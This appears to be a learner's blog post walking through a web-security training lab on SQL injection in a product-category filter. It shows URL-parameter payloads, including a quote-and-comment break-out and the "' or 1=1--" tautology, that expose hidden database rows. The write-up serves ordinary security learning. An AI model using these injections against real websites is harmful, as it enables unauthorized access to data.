Lab: SQL injection vulnerability in WHERE clause allowing retrieval of hidden data

This lab contains an SQL injection vulnerability in the product category filter. When the user selects a category, the application carries out an SQL query like the following:

SELECT * FROM products WHERE category = ‘Gifts’ AND released = 1

To solve the lab, perform an SQL injection attack that causes the application to display details of all products in any category, both released and unreleased.

First, let’s click on a category.

After clicking on the corporate gifts category, the URL shows:

https://ac321f581f89aa2e808a3eb200d10094.web-security-academy.net/filter?category=Corporate+gifts

Notice the bold words, which are the query string.

The application will make a SQL query to retrieve information from the database:

SELECT * FROM products WHERE category = 'Corporate gifts' AND released = 1

The objective is to retrieve all products info, from all category, and both released and unreleased products.

The above statement shows released = 1 meaning it will only show products that are released, where released = 0 represents unreleased.

Next if i add a single quote at the end of the query string:

?category=Corporate+gifts'

In the SQL query:

SELECT * FROM products WHERE category = 'Corporate gifts'' AND released = 1

This will cause an error, as there is one single quote that is not closed.

Next, I add a double dash:

?category=Corporate+gifts'--

In the query string:

SELECT * FROM products WHERE category = 'Corporate gifts'--' AND released = 1

Anything after the -- will be treated as comments in sql.

Meaning now the website should be showing all products of category, Corporate gifts, both released and unreleased. Notice that there is an additional item called Folding Gadgets.

To fully show everything on the database:

?category=Corporate+gifts' or 1=1--

In query string:

SELECT * FROM products WHERE category = 'Corporate gifts' or 1=1--' AND released = 1

Now with the above query it will return all products when the category is either Coporate gifts or 1=1 , since 1=1 is always true, it will return all items.

Your lab should be solved at this point.

Started my journey in cybersecurity on September 2020. This blog is used mainly to record my learning journey.

Love podcasts or audiobooks? Learn on the go with our new app.

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
Yikai

Yikai

Started my journey in cybersecurity on September 2020. This blog is used mainly to record my learning journey.

More from Medium